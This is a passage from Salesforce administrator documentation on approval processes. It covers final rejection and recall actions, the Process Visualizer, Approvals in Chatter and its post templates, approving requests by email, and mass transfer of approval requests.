can change the status to “Rejected,” send an email notification, and unlock the record so that users can edit it before resubmitting.

When a record has been rejected by all approvers, Salesforce executes all final rejection actions. A default final rejection action
called Record Lock is selected for you. You can modify it to automatically lock or unlock a record. You can select up to 40
additional actions to occur when a record is rejected, 10 of each of the following types:

DescriptionType

Assigns a task to a user you specify. You can specify the Subject, Status, Priority, and
Due Date of the task.

Task

Uses an email template you specify to send an email to a designated recipient.Email Alert

Changes the value of a selected field. You can specify a value or create a formula for the new
value.

Field Update

Sends a message to an endpoint you designate. You can also specify a username and the data
you want to include in the message.

Outbound Message

To manage the final rejection actions for an approval process, from Setup, click Create > Workflow & Approvals > Approval
Processes and select the approval process.
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• The Final Rejection Actions related list shows all the actions that take place when a record is finally rejected.

• Click Edit to change an action. Any changes you make to an action affect any other approval processes or workflow rules
that use it. This option is only available for some types of actions.

• Click Remove to remove the action from the approval process. This does not delete the action. This option is only available
for some types of actions.

• Click Add Existing to add another action to the list of actions. See Selecting Approval Actions on page 3186.

• Click Add New and select the appropriate type to create a new action and associate it with the approval process. Next,
configure the action:

◊ Configure the email alert.

◊ Configure the field update.

◊ Configure the outbound message.

◊ Configure the task.

See Also:
Getting Started with Approval Processes
Process Visualizer Overview
Approval Process Terminology

Recall Actions

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or edit recall actions:

Recall actions are the actions that occur when a submitted approval request is recalled. By default, an action to unlock the
record runs automatically on recall. Recall actions can include email alerts, field updates, tasks, or outbound messages. For
example, a recall action can change the status of a request from “In Progress” to “Not Submitted.”

If the Allow submitters to recall approval requests option is selected for the approval process, both submitters and administrators
can see the Recall Approval Request button in the Approval History related list on the detail page of submitted records;
otherwise, only administrators can see it. When a user clicks Recall Approval Request, the pending approval request for the
record is withdrawn and recall actions are run.

When a record has been recalled after submission, Salesforce executes all recall actions, including unlocking the record. You
can select up to 40 additional actions to occur when a record is recalled, 10 of each of the following types:

DescriptionType

Assigns a task to a user you specify. You can specify the Subject, Status, Priority, and
Due Date of the task.

Task
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DescriptionType

Uses an email template you specify to send an email to a designated recipient.Email Alert

Changes the value of a selected field. You can specify a value or create a formula for the new
value.

Field Update

Sends a message to an endpoint you designate. You can also specify a username and the data
you want to include in the message.

Outbound Message

To manage recall actions for an approval process, from Setup, click Create > Workflow & Approvals > Approval Processes,
and select the approval process.

The Recall Actions related list shows all the actions that take place when a record is recalled.

• Click Edit to change an action. Any changes you make to an action affect any other approval processes or workflow rules
that use it. This option is only available for some types of actions.

• Click Remove to remove the action from the approval process. This does not delete the action. This option is only available
for some types of actions.

• Click Add Existing to add another action to the list of actions. See Selecting Approval Actions on page 3186.

• Click Add New and select the appropriate type to create a new action and associate it with the approval process. Next,
configure the action:

◊ Configure the email alert.

◊ Configure the field update.

◊ Configure the outbound message.

◊ Configure the task.

See Also:
Getting Started with Approval Processes
Process Visualizer Overview
Approval Process Terminology

Managing Approval Processes
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, delete, or clone approval processes:

“View Setup and Configuration”To view approval processes:

An approval process is an automated process your organization can use to approve records in Salesforce. An approval process
specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply to all records
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included in the process, or just records that meet certain administrator-defined criteria. An approval process also specifies the
actions to take when a record is approved, rejected, recalled, or first submitted for approval.

To manage approval processes, from Setup, click Create > Workflow & Approvals > Approval Processes.

• Select an object from the drop-down list to create, edit, or delete approval processes for that object.

• To create a new approval process, click Create New Approval Process. See Creating Approval Processes on page 3169.

• To change the order of your active approval processes, change the numbers in the Process Order column and click Reorder.
• Click Del next to an inactive approval process to delete it. Before deleting an approval process, make sure it is inactive and

that no records have been submitted for approval. If any records have been submitted, delete them and remove them from
the Recycle Bin.

• Click Edit next to an approval process to change it.

• Click Activate next to an inactive approval process to activate it. An approval process must have at least one step before
you can activate it.

• Click Deactivate next to an active approval process to make it inactive. The approval process moves to the list of inactive
approval processes.

• Select an approval process to view the details:

◊ Click Clone to create a new approval process based on the selected approval process.

◊ Click Deactivate to make the approval process inactive.

◊ Click Delete to delete an inactive approval process. Before deleting an approval process, make sure it is inactive and
that no records have been submitted for approval. If any records have been submitted, delete them and remove them
from the Recycle Bin.

◊ Click Edit and choose an option from the drop-down button to jump to the appropriate wizard page:

- Specify Name, Unique Name, and Description

- Specify Criteria for Entering Process

- Specify Approver Field and Record Editability

- Select Email or Chatter Post Notification Template

- Configure Approval Request Page Layout

- Specify Initial Submitters

Tip:  You can use the Developer Console to debug workflow rules. The Developer Console lets you view debug log
details and information about workflow rules and actions, such as the name of the user who triggered the workflow
rule and the name and ID of the record being evaluated.

See Also:
Getting Started with Approval Processes
Managing Multiple Approval Requests
Process Visualizer Overview
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Viewing Your Approval Process
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To view approval processes:

To view the details of an approval process, from Setup, click Create > Workflow & Approvals > Approval Processes and
click a process name.

In the header of the approval process detail page you can:

• Edit, clone, or delete the process.

• Activate or deactivate the process.

• Click View Diagram to see a graphical representation of the process in the Process Visualizer.

• View the process name, unique name, description, entry criteria, record editability, and initial submitters.

• See which email template is assigned to the process.

• If Approvals in Chatter is enabled in your organization, see which approval request Chatter post template is assigned to
the process. If the Approval Post Template field is blank, then the process is using either the system default post
template or the object's custom default post template.

• See if the process is active.

• See what determines the next automated approver.

• See if submitters are allowed to recall approval requests.

From the related lists on this page you can:

• Add an existing action.

• Create a new action and apply it to the process.

• Edit or remove actions.

• Add a new approval step.

• Edit or delete steps.

See Also:
Managing Approval Processes

Process Visualizer Overview

Available in: Enterprise, Unlimited, and Developer Editions

You can use the Process Visualizer to:
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• Display a flowchart of each saved approval process.

• Improve communication about the approval process and gain buy-in from step owners.

• Reinforce your company's policies by documenting the decisions you reached when the approval process was designed.

• Print an annotated version of the approval process, where numbers added to the diagram correspond to details in a table,
which is included in the printable view.

• Share approval process diagrams by saving annotated versions as PDF files (requires an Adobe® PDF print driver).

• Help you quickly locate key details by searching multi-step or complex diagrams for matching text.

• Help you visualize and understand graphically:

◊ The steps necessary for a record to be approved.

◊ The designated approvers for each step.

◊ The criteria used to trigger the approval process.

◊ The specific actions to take when a record is approved, rejected, recalled, or first submitted for approval.

See Also:
Launching the Process Visualizer
Understanding the Process Visualizer User Interface
Understanding the Process Visualizer Notation

Launching the Process Visualizer

Available in: Enterprise, Unlimited, and Developer Editions

User Permission Needed

“View Setup and Configuration”To view approval steps:

Before you can use the Process Visualizer, you must:

• Enable or download the Adobe Flash Player plugin, version 9.0.115 or later, in your browser

• Have at least one approval process defined in your organization

After completing the prerequisites:

1. From Setup, click Create > Workflow & Approvals > Approval Processes.
2. Click the name of the approval process you want to view.
3. On the detail page for the approval process, click View Diagram.
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Each approval process diagram is for viewing purposes only. You cannot update an approval process from the Process Visualizer.
After saving your changes to the approval process, click View Diagram to view the updates or, if the Process Visualizer window
is still open, click Refresh.

See Also:
Understanding the Process Visualizer User Interface
Understanding the Process Visualizer Notation
Process Visualizer Overview

Understanding the Process Visualizer User Interface

Available in: Enterprise, Unlimited, and Developer Editions

User Permission Needed

“View Setup and Configuration”To view approval steps:

This topic contains the following sections:

• About the Process Visualizer UI

• Displaying Hover Details for an Approval Process Diagram

• Displaying Approval Process Properties

• Printing Diagrams and Saving PDFs

• Finding Text in a Diagram

• Refreshing an Approval Process Diagram

• Changing an Approval Process Diagram's Zoom Level

• Using the Navigator

About the Process Visualizer UI

The user interface for the Process Visualizer has several functional areas.
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Figure 20: Process Visualizer User Interface

The highlighted numbers in the illustration correspond to the following descriptions:

1. The main area contains the approval process diagram, helping you visualize the overall flow, rules, actions, and dependencies.
The diagram's orientation is top-to-bottom, left-to-right. The entry criteria for the approval process are shown at the top
of the diagram. Record processing moves down the flowchart until the final approval or rejection. Each flowchart component
uses a shape, an icon, or both to represent the type of processing that may happen.

2. The diagram's legend summarizes the icons. When you first use the Process Visualizer, the legend is hidden. To display
the legend, click Show Legend. When you subsequently open other diagrams, the Process Visualizer remembers your last
setting (shown or hidden).

3. The banner has a find box so you can find matching text within the approval diagram. Use the Previous and Next buttons
to scroll through your matches.

4. Next to the diagram is an informational sidebar. The top pane in the sidebar presents the Approval Process Properties,
which is collapsed by default. The Approval Process Properties pane lists information such as the name of the approval
and whether it has been activated. Expand the pane by clicking the arrow icon.

5. The bottom pane of the sidebar contains the hover details, which lists information about the currently selected component
on the diagram. You can hover over or click a component to view its details.

6. In the lower right of the diagram pane is a navigator window. Drag the pane within the navigator to view different parts
of the diagram.

7. In the upper left of the diagram pane is a zoom slider. Use it to zoom in and out of your process diagram.
8. In the left side of the banner, use the buttons to get a printable view of the diagram, to refresh the diagram, or to hide or

show the legend and navigator.

Displaying Hover Details for an Approval Process Diagram

When you hover over or click a flowchart component, the Process Visualizer displays information about it in the sidebar,
which remains there until you hover over or click a different component.

The following table lists the type of information you can see in the hover details.
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Hover Detail Message FormatsComponent Type

Approval required from:Approval steps
• User: user-name
• Role: role-name

Or if defined for the step, one of the following values:

• Submitter can choose approver
• Automatically assigned to Manager field
• Unanimous approval required from: approver-1,

approver-n...

• Approval based on first response from: approver-1,
approver-n...

• Related User: object-name Owner
• The approver's delegate may also approve this request

Description:

Field updates • Update field-name with lookup value: lookup-value
• Update field-name with value: value
• Update field-name with formula: formula

Send (email-template) email to recipient-1,
recipient-n... and additional recipients: cc email
field of email alert

Email alerts

Assign task to assignee with due date: dateTasks

Send to endpoint endpoint-url the following fields:
field-1, field-n,...

Outbound messages

Displaying Approval Process Properties

In the sidebar, the Approval Process Properties pane lists the information shown in the following table. Click the arrow to
expand or collapse it. When you subsequently open other diagrams, the Process Visualizer remembers your last setting (expanded
or collapsed).

DescriptionProperty

A user-defined name of the approval process.Process Name

Appears only when there are no entry criteria for the process,
displaying with a “No” value.

Entry Criteria?

Indicates whether the approval process is active.Active?

The description of the approval process.Description

Shows the defined value for this property. For example:
Administrator or current approver.

Record Editability

Shows the value for this property. For example: Manager of
Owner

Next Automated Approver Determined By
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DescriptionProperty

The name of the template used for email alerts. For example:
Leads: New assignment notification (SAMPLE)

Approval Assignment Email Template

Shows the defined value for this property. For example: Record
Owner

Initial Submitters

Shows the defined value, Yes or No, for this property.Allow Submitters to Recall Approval Requests?

The name of the person who created the approval process.Created By

The name of the last person to modify the approval process.Modified By

Printing Diagrams and Saving PDFs

To print an annotated version of the diagram, click Printable View. In this view, the numbers on the diagram correspond to
details shown in a table directly below it. Use the printed or PDF version of the diagram to communicate information about
the approval process, get buy-in from the people who participate in the approval decisions, and help the approval process users
understand the requirements and flow. Click Print and select a printer. If you have an Adobe PDF print driver installed, you
can save the printable view as a PDF file. To return to the diagram, click Exit Printable View.

Finding Text in a Diagram

Use the find function in the Process Visualizer banner to find detailed information quickly. This is helpful when you view a
diagram with ten or more steps, complex formulas, or the names of many people or roles on the approvers' lists. You can find
matching text within the diagram and the Approval Process Properties pane, and view the results highlighted in the sidebar.
The number of matches is displayed beside the Previous and Next buttons, which you can use to scroll through your matches.
Find is case insensitive, and treats the search terms as a phrase in quotes.

Use the find filters to limit results to a specific parameter: Approval Steps, Tasks, Email Alerts, Field Updates, and Outbound
Messages. Click the arrow next to the Find field to select a filter. For example, to find all tasks for Jane Smith, click the
arrow next to the Find field, select Tasks, then enter Jane Smith.

Note: All is the only filter that includes Approval Process Properties, Entry Criteria, and Go Back steps in its search
parameters. If you select a filter but don't enter any text, all instances of that filter item are highlighted in the diagram
and navigation pane.

Refreshing an Approval Process Diagram

Each approval process diagram is for viewing purposes only. You cannot update an approval process from the Process Visualizer.
After saving your changes to the approval process, click View Diagram to view the updates or, if the Process Visualizer window
is still open, click Refresh.

Changing an Approval Process Diagram's Zoom Level

Use the zoom slider in the upper left to change the diagram's size. Click + to zoom in, and – to zoom out, or drag the slider
tab up and down the bar. This feature is especially helpful when you are viewing large, complex approval processes in the
Process Visualizer.

Note:  The zoom feature is only visible for diagrams that exceed the dimensions of the display window.
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Using the Navigator

Click and drag the pane around the navigator window to quickly view different areas of a large approval process diagram.
When you use the find feature, the navigator window changes to highlight the matches, which allows you to see items not
visible in the main diagram display area. The navigator also reflects changes to the size of the diagram in the main display
when you use the zoom slider.

See Also:
Launching the Process Visualizer
Understanding the Process Visualizer Notation
Process Visualizer Overview

Understanding the Process Visualizer Notation

Available in: Enterprise, Unlimited, and Developer Editions

User Permission Needed

“View Setup and Configuration”To view approval steps:

The Process Visualizer uses the following notation to graphically represent each approval process. The shapes are based on
the Business Process Modeling Notation (BPMN) standard. In the Process Visualizer, a shape's color changes from gray to
blue when you hover over or click it.

DescriptionIcon and Shape Examples

Near the top of the diagram, a Start circle indicates the beginning of the approval process.
If defined, an Entry Criteria diamond precedes the Start circle. When you hover over
or click Entry Criteria, the Process Visualizer displays the entry criteria in the sidebar's
hover details pane. For example, an approval process for a lead is triggered when
Lead.AnnualRevenue >= 10000. The arrow below the Start circle leads to the next
criteria in the approval process. If a recall action was defined for the entry criteria, a line to
the right connects to the Final Recall Actions rectangle.
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DescriptionIcon and Shape Examples

The rectangle labeled Initial Submission Actions represents any actions you defined
in initial submission. At a minimum, this element shows the record lock set automatically
by Salesforce to prevent updates by other users. Later during the approval process, after the
record is approved, rejected, or recalled, the record is unlocked.

A diamond with Yes or No branches represents the numbered step's criteria or formula that
is evaluated before proceeding. Hover over or click the diamond to see the criteria or formula
in the sidebar's hover details. For example, the criteria could be used to determine whether
the Lead.Rating = Hot. If true, the approval process continues to the next step on the
Yes branch. If false, the approval process continues to the next step on the No branch.

A rectangle containing a human icon,  represents an approval step. The Approved path
includes a small diamond. The Rejected path uses a backslash.

A rectangle without a human icon or a plus sign represents a single action. The action types
and icons are:
•

Send an email alert: 
•

Start a task: 
•

Perform a field update: 
•

Send an outbound message: 

In this example, a task has been assigned. When you hover over or click the rectangle, look
for more information in the sidebar's hover details.
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DescriptionIcon and Shape Examples

A rectangle with a plus sign (+) represents multiple actions. The actions shown inside are
performed simultaneously, as a unit. To expand the display and view the individual actions,
click the plus sign. In the expanded display, the Process Visualizer displays the individual
actions, one per rectangle.

When you hover over or click a shape on the diagram, and it is part of a step, all the elements
that comprise the step use a glowing background color. This visual clue helps you locate all
the decisions and actions that comprise each step, and how the processing may branch based
on the record's values.

In the approval process definition, if the option was enabled to perform only the rejection
actions for this step and send the approval request back to the most recent approver. (go back
one step), the diagram displays a Go Back circle. When you hover over or click the Go Back
circle, the hover details pane displays a message. For example:

On rejection send the request back to any one of the following
steps, depending on the most recent approver: - list-of-steps. If
no approvers are found, the request goes to Final Rejection.

The identified steps depend on where in the approval process the Go Back was defined. The
possible steps are highlighted when you hover over the Go Back circle. In the diagram, the
Process Visualizer displays the Go Back circle only for a step where its preceding step is
defined as a skip.
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DescriptionIcon and Shape Examples

The Final Approval Actions rectangle leads to a circle labeled Approved, as shown
here. The Final Rejection Actions rectangle leads to a circle labeled Rejected. If
a recall action was defined, the Final Recall Actions rectangle shows that the record
is now unlocked, and the arrow leads to a circle labeled Recalled.

See Also:
Launching the Process Visualizer
Understanding the Process Visualizer User Interface
Process Visualizer Overview

About Approvals in Chatter
Available in: Enterprise, Unlimited, and Developer Editions

If your organization has both Approvals and Chatter enabled, administrators can turn on Approvals in Chatter, which lets
users receive approval requests as posts in their Chatter feeds. You can also customize the way the approval request post displays
in Chatter by creating unique post templates and associating them with your approval processes.

Tip:  To get the most out of Approvals in Chatter, we recommend taking some time to prep your organization before
turning it on. See Getting Started With Approvals in Chatter for implementation best-practices.

Where Can I Find Approval Request Posts?

Approval request posts show up:

• In the assigned approver's Chatter feed.
• On the submitter's profile, but not in their Chatter feed unless they're following the approval record.
• In the Chatter feed of the approval record.
• In the Chatter feed of anyone following the approval record.
• In the object-specific filter on the Chatter tab of anyone following the approval record.
• In the Company filter of every user with access to the approval record.
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Note:  Only users with access to the approval record can see the approval request post. Comments on approval posts
aren't persisted to the approval record.

Users who opt out of receiving approval request posts don't see them in their own feed but can see posts in the record's feed.
Anyone with access to the approval record can see approval posts in the record feed.

Tip: To keep tabs on the progress of your submitted approval, we recommend you follow the approval record in
Chatter.

See Also:
Enabling Approvals in Chatter
Approvals in Chatter Considerations

Getting Started With Approvals in Chatter

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable Approvals in Chatter:

Because it relies on both Chatter and Approvals, getting your organization set up for Approvals in Chatter involves more than
just turning on the feature. To be sure that everything works correctly and that your users will see their approval requests as
Chatter posts, we recommend that you follow these steps when you're ready to turn Approvals in Chatter on for your
organization:

1. Create an approval process.
2. Make sure Chatter feed tracking is enabled for the object on which your approval process is based.
3. Create an approval post template for the object on which your approval process is based. If you want to make this the

default template for all approval processes on this object, be sure to check the Default checkbox when configuring your
post template.

4. Repeat steps 1 – 3 for all approval processes in your organization, as needed.
5. Enable Approvals in Chatter. Waiting to do this as the last step ensures that all approval processes in your organization

are properly configured to take advantage of it. After turning it on, all existing active approval processes will start generating
Chatter posts.
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Note:  You can create custom post templates for one or more approval processes, but you can only associate custom
post templates with approval processes after enabling Approvals in Chatter.

See Also:
About Approvals in Chatter
Approvals in Chatter Considerations

Enabling Approvals in Chatter

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable Chatter or Approvals in Chatter:

If your organization has both Approvals and Chatter enabled, administrators can turn on Approvals in Chatter, which lets
users receive approval requests as posts in their Chatter feeds.

1. From Setup, click Customize > Chatter > Settings.
2. Click Edit.
3. Select Allow Approvals.
4. Click Save.

Users can update their own Chatter settings to opt out of receiving approval requests as posts in their Chatter feeds. Users
who opt out of receiving approval request posts don't see them in their own feed but can see posts in the record's feed. Anyone
with access to the approval record can see approval posts in the record feed. Users who elect to receive approval requests via
Chatter receive both an email notification and a post in their Chatter feed.

See Also:
About Approvals in Chatter
Approvals in Chatter Considerations
Getting Started With Approvals in Chatter

Approvals in Chatter Considerations

Available in: Enterprise, Unlimited, and Developer Editions

Keep these issues in mind when working with Approvals in Chatter:
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• After Approvals in Chatter is enabled in your organization, it is turned on for all users. Users can then update their own
Chatter settings to opt out of receiving approval requests as posts in their Chatter feeds.

• Users who elect to receive approval requests via Chatter receive both an email notification and a post in their Chatter feed.

• To keep tabs on the progress of your submitted approval, we recommend you follow the approval record in Chatter.

• Different users see different configurations of the approval request post:

◊ Only approvers see approval action buttons on their posts, and then only in their profile feed or their news feed.

◊ Only approvers see approver names in the header.

• If a step requires unanimous approval from multiple approvers, the approval request post for that step doesn't list all selected
approvers in its header. Approvers see only their own name in the post header.

• When an approval request is recalled, a new post is generated. It appears on the news feeds of the submitter, all approvers
and followers of the object, as well as on the record feed.

• If you make your approval object a detail object in a master-detail relationship, the Owner field isn’t available for approval
page layouts or approval post templates.

• If you change the approver, step name, or the routing type on an approval process while it's in progress, existing approval
posts aren't updated.

• If you are an assigned approver and you opt out of receiving approval requests as posts while an approval is in progress,
and you're not following the approval record, you won't see any new notification posts after opting out. However, if you
are following the approval record, after opting out you will see approval posts from the record with non-approver content.
Any approval notification posts you received prior to opting out are updated to show non-approver content, and the
approve/reject buttons disappear from any existing posts in your feed.

• Approvals in Chatter works normally for approvals on Products, with one exception: If the product isn't active and the
approver also doesn't have edit access to Products, approval post notifications for that product won't show up in the
approver's feeds. The approver can only see approval posts in the product record’s feed.

Limitations

• Approvals in Chatter doesn't support delegated approvers or queues.
• You can't recall or reassign an approval request from a post. Both must be done from the approval record.
• Approval posts can't be deleted in the Salesforce user interface; you can only delete them through the API.
• Approval requests from Sites or portal users aren't supported.

See Also:
About Approvals in Chatter
Getting Started With Approvals in Chatter
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Managing Approval Request Post Templates for Chatter

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and view approval request post templates:

If your organization has both Approvals and Chatter enabled, administrators can turn on Approvals in Chatter, which lets
users receive approval requests as posts in their Chatter feeds. With approval post templates for Chatter, you can customize
the information that is included in the approval request post when it displays in a Chatter feed.

Note:  Only users with access to the approval record can see the approval request post. Comments on approval posts
aren't persisted to the approval record.

To manage your custom approval post templates, from Setup, click Create > Workflow & Approvals > Post Templates.

From the template list page, you can:

• Create a new post template.

• Click a template's name to go to its detail page.

• Edit or delete a post template.

Note: You can't delete an approval post template if it's in use by an approval process.

Keep these issues in mind when working with approval post templates:

• You can set a post template as the default template for an object by clicking Edit from the template’s detail page.

• You can only create an approval post template for an object that is both enabled for approvals and supported for Chatter
feed tracking. You can't associate a post template to an approval process unless feed tracking for the object has been turned
on.

• Deleting a custom field from a standard object removes the custom field from any post template that refers to that object.
Existing posts using the template aren't affected. Undeleting the custom field restores it to the available fields list and to
any post templates that contained it previously.

• Deleting a custom field from a custom object removes the custom field from any post template that refers to that object.
Undeleting the custom field in this case restores it to the available fields list, but does not restore it to the post templates
that contained it previously.

• Hard deleting a custom object removes all post templates related to it. Soft deleting a custom object makes related post
templates invisible on the template list page. Existing posts using affected templates aren't changed. Undeleting the custom
object restores the post templates associated with it.
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• If you rename a custom object, post templates associated with it update accordingly.

See Also:
Creating and Editing Approval Request Post Templates for Chatter
Viewing Approval Request Post Templates
Managing Deleted Custom Fields

Creating and Editing Approval Request Post Templates for Chatter

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and view approval request post templates:

With approval post templates for Chatter, you can customize what information gets included in the approval request post
when it displays in a Chatter feed.

1. From Setup, click Create > Workflow & Approvals > Post Templates.
2. Click New Template.
3. Select the object for your template.
4. Click Next.
5. Enter a template name.
6. Optionally, change the template's unique name.
7. Enter a description.
8. Select the checkbox to make this the default template for the associated object.
9. Select up to four fields to display on the approval request post and click Add.
10. Sort the fields by selecting them and clicking Up or Down.
11. Click Save.

Note: You can only create an approval post template for an object that is both enabled for approvals and supported
for Chatter feed tracking. You can't associate a post template to an approval process unless feed tracking for the object
has been turned on.

You can edit an approval post template in two ways. First go to Create > Workflow & Approvals > Post Templates.

• Click Edit in the Action column.

• Click a template name, then click the Edit button from the template detail page.

See Also:
Managing Approval Request Post Templates for Chatter
Viewing Approval Request Post Templates
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Viewing Approval Request Post Templates

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create and view approval request post templates:

To view approval post request template details, from Setup click Create > Workflow & Approvals > Post Templates, then
click the name of a template. From this page, you can:

• View template details, such as its object, name, description, and any object fields included.

• See whether this template is set as the default for the associated object. Click Edit to set the template as the object's custom
default template.

• Edit, delete, or clone the template.

Note: You can't delete an approval post template if it's in use by an approval process.

Processing Approval Requests
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Permissions vary depending on the approval process settingsTo approve, reject, or reassign approval requests:

“API Enabled”To approve and reject approval requests via email:

Your administrator can set up an approval process that lets you submit records for approval. Depending on the approval process
settings, records may need to have specific attributes before you can submit them. Also, a single record may need to go through
several layers of approval.

Depending on the approval process settings, you can submit, recall, reassign, approve, or reject approval requests using the
Approval History related list on a record detail page.

You can also manage your assigned approval requests from the Items To Approve related list on the Home tab. See Items to
Approve on page 3203.

Note:  You must have read access on a record to approve, reject, reassign, or recall an approval request for that record.
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Approving and Rejecting Requests Via Email

If you are the assigned approver for an approval request, you will receive an email notification.

To approve requests via email:

1. Click the link supplied in the email notification for an approval request. If there is no link in the email notification, contact
your administrator.

2. Click Approve.
3. Enter any comments you want attached to the approval request.
4. When available, select the next approver.
5. Click Approve.

To reject requests via email:

1. Click the link supplied in the email notification for an approval request. If there is no link in the email notification, contact
your administrator.

2. Enter any comments you want attached to the approval request.
3. Click Reject.

If email approval response is enabled, you can alternatively reply to the email notification by typing the word approve,
reject, approved, rejected, yes or no in the first line of the email body. You can also add comments in the second
line.

Note:

• Approval request comments are limited to 4,000 characters. In Chinese, Japanese, or Korean, the limit is 1,333
characters.

• If the word in your response isn’t recognized, you receive an error notification email. To submit another response,
reply again to the original email notification.  Replies to the error notification email won’t be processed.

Approving and Rejecting Requests via Chatter

If your organization has Approvals in Chatter enabled, you can set your Chatter settings to receive approval requests as posts
in your Chatter feed in addition to receiving them as emails.

Note:  Only users with access to the approval record can see the approval request post. Comments on approval posts
aren't persisted to the approval record.

To approve or reject approval requests in Chatter, click the Approve or Reject buttons on the post.

See Also:
Approval Processes Overview
Managing Multiple Approval Requests

Enabling or Disabling Approval Request Posts
If your organization has Approvals in Chatter enabled, you can receive approval requests as posts in Chatter.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions.
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User Permissions Needed

“Read” on the recordTo view a record:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Chatter Settings > My Feeds.
• If you clicked My Settings, select Chatter > My Feeds.

3. Select Receive approval requests as posts to receive approval requests in posts or deselect the option to stop
receiving approval requests.

By default, you automatically receive approval requests in posts when your administrator turns on Approvals in Chatter.

4. Click Save.

Note:  Only users with access to the approval record can see the approval request post. Comments on approval posts
aren't persisted to the approval record.

Items to Approve

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Permissions vary depending on the approval process settingsTo use the Items to Approve related list:

The Items to Approve related list tracks the open approval requests assigned to you. If your administrator has created an
approval process for your organization, you may see this related list on your home page. Depending on the approval process
settings, you can:

• Click an approval request to view more details about it.

• To assign the approval request to another user, click Reassign next to an item.

• To display the approval request detail page and approve or reject a pending approval request, click Approve / Reject next
to an item.

Note:  You must have read access on a record to approve, reject, reassign, or recall an approval request for that
record.

• Click Manage All to manage all of your assigned approval requests. Next, select approval requests by checking the appropriate
boxes. Optionally, check the box in the column header to select all currently displayed items.

◊ Click Reassign to assign the selected approval requests to another user, choose the user, enter any comments, and click
Save.
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◊ Click Approve / Reject to display the approval request detail page and click Approve or Reject to approve or reject
all selected approval requests at once.

Note:  You must have read access on a record to approve, reject, reassign, or recall an approval request for that record.

See Also:
Processing Approval Requests
Managing Multiple Approval Requests

Approval History

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Permissions vary depending on the approval process settingsTo use the Approval History related list:

The Approval History related list tracks a record through the approval process. If an approval process exists for an object, you
may see this related list on a record detail page. Depending on the approval process settings, use this related list for the following:

• To submit a record for approval, click Submit for Approval. Salesforce begins the approval process if any approval processes
apply to the record. This option is not available after the record has been submitted. Depending on the approval process,
you may be prompted to select the next approver.

• To take a record out of the approval process, click Recall Approval Request. This is only available if the record is in an
approval process, and if the approval process is set up to allow submitters to recall approval requests. When a user clicks
Recall Approval Request, the pending approval request for the record is withdrawn and recall actions are run. For more
information, see Recall Actions on page 3183.

• To assign the approval request to another user, click Reassign next to an item.

• To display the approval request detail page and approve or reject a pending approval request, click Approve / Reject next
to an item.

Note:  You must have read access on a record to approve, reject, reassign, or recall an approval request for that
record.

Depending on how your administrator customizes the Approval History related list, it can contain the following Status
values:

DefinitionStatus

The record has been submitted for a approval.Submitted
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DefinitionStatus

The record has been submitted for approval and is awaiting
approval or rejection.

Pending

The record has been approved.Approved

The record has been rejected.Rejected

The record has been submitted for approval but assigned to a
different approver.

Reassigned

The record was submitted for approval but recalled from the
approval process.

Recalled

Before you can submit a record for approval, it must meet the criteria for an active approval process. Contact your administrator
to find out about the attributes a record must have to be included in an active approval process for your organization.

See Also:
Processing Approval Requests
Approval Processes Overview

Managing Multiple Approval Requests
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Transfer Leads”

AND

“Transfer Record”

To manage multiple approval requests:

To transfer multiple approval requests from one user to another or to remove multiple approval requests from the approval
process:

1. Before transferring an approval request, make sure the new assigned approver has access to read the records for the approval
requests. For example, a user that does not have read access to an Expenses custom object will not be able to view expense
approval requests.

2. From Setup, click Data Management > Mass Transfer Approval Requests.
3. Enter the search conditions that the approval requests you are transferring must match. For example, you could search for

approval requests that were submitted by a particular user by specifying Submitter equals jsmith..
4. Click Find to search for approval requests that match.
5. Choose an option:
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• Mass remove records from an approval process unlocks the records and removes them from any approval
process so they no longer appear on the approver's list of pending approval requests.

• Mass transfer outstanding approval requests to a new user allows you to select a user and assign
that user as the approver for all approval requests selected.

6. Optionally, enter any comments to be stored with the approval requests. The comments you enter are displayed on the
Approval History related list if your administrator has customized it to include the Comments field.

7. Select the checkbox next to each approval request you want to transfer or remove from the approval process, depending
on the option you selected previously.

8. Click Transfer or Remove, depending on the option you selected previously.

See Also:
Approval Processes Overview
Approval Process Terminology

Approval Process Considerations
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Various user permissions required depending on the actionTo use approvals:

Before you implement an approval process for your organization, consider the following:

• Active approval processes can't be deleted but they can be deactivated. Before deleting an approval process, make sure it
is inactive and that no records have been submitted for approval. If any records have been submitted, delete them and
remove them from the Recycle Bin.

• You can enable email approval response. The email approval response feature gives users the ability to approve or reject
email approval requests by replying to the email. Approvers must have the “API Enabled” system permission to approve
or reject approval requests via email.

• If you make your approval object a detail object in a master-detail relationship, the Owner field isn’t available for approval
page layouts or approval post templates.

• Educate your users on the criteria for each approval process and what each of your approval processes does. Users can't tell
what approval process is triggered when they click Submit for Approval.

• Records are locked while in an approval process. The ability to edit a locked record depends on the record editability setting
of the approval process:

◊ Administrators ONLY: Only users with the “Modify All” object-level permission for the given object, or the “Modify
All Data” permission, can edit locked records.

◊ Administrators or the currently assigned approver...: The current approver and users who match
the Administrators ONLY criteria can edit locked records. The current approver must also have edit access to the
record through their permissions and the organization-wide sharing defaults for the given object.

You can still add campaign members to campaigns locked for approval.
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• Approval processes that allow the user to select an approver manually also allow the user submitting a request to select
himself or herself as the approver.

• An approval process can specify a field update action that re-evaluates workflow rules for the updated object. If, however,
the re-evaluated workflow rules include a cross-object field update, those cross-object field updates will be ignored.

Error Messages

• An error message displays for the user submitting an approval request:

